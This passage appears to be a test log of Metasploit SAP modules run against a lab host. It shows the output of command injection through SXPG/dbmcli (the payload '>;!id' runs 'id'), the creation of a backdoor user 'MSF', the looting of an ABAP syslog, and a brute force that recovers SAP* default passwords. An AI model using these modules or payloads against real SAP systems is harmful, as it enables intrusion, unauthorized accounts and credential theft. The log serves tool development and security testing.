[*] Auxiliary module execution completed
```
- sap_soap_rfc_dbmcli_sxpg_command_exec

```
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_command_exec) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.172.179:8042 - got response
[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.172.179:8042 - got response

[SAP] SXPG_COMMAND_EXEC dbmcli Command Injection
================================================

   Output
   ------
   >;!id
   uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


* sap_soap_bapi_user_create1

msf auxiliary(sap_soap_bapi_user_create1) > run

[*] [SAP] 192.168.172.179:8042 - Attempting to create user 'MSF' with password 'msf1234'
[+] [SAP] 192.168.172.179:8042 - User 'MSF' with password 'msf1234' created
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_mgmt_con_abaplog: was working, just printing the path where the loot is stored

```
msf auxiliary(sap_mgmt_con_abaplog) > run

[*] 192.168.172.179:50013 [SAP] Connecting to SAP Management Console SOAP Interface
[*] 192.168.172.179:50013 [SAP] ABAP syslog downloading
[*] 192.168.172.179:50013 [SAP] Storing looted SAP ABAP syslog XML file
[+] 192.168.172.179:50013 [SAP] SAP ABAP syslog XML file stored at /Users/juan/.msf4/loot/20130501133926_default_192.168.172.179_sap.abap.syslog_177904.xml
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- sap_soap_rfc_brute_login

```
msf auxiliary(sap_soap_rfc_brute_login) > run

[*] Brute forcing clients 000,001,066

[SAP] Credentials
=================

   host             port  client  user  pass
   ----             ----  ------  ----  ----
   192.168.172.179  8042  001     SAP*  06071992
   192.168.172.179  8042  001     SAP*  PASS
   192.168.172.179  8042  001     SAP*  06071992

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
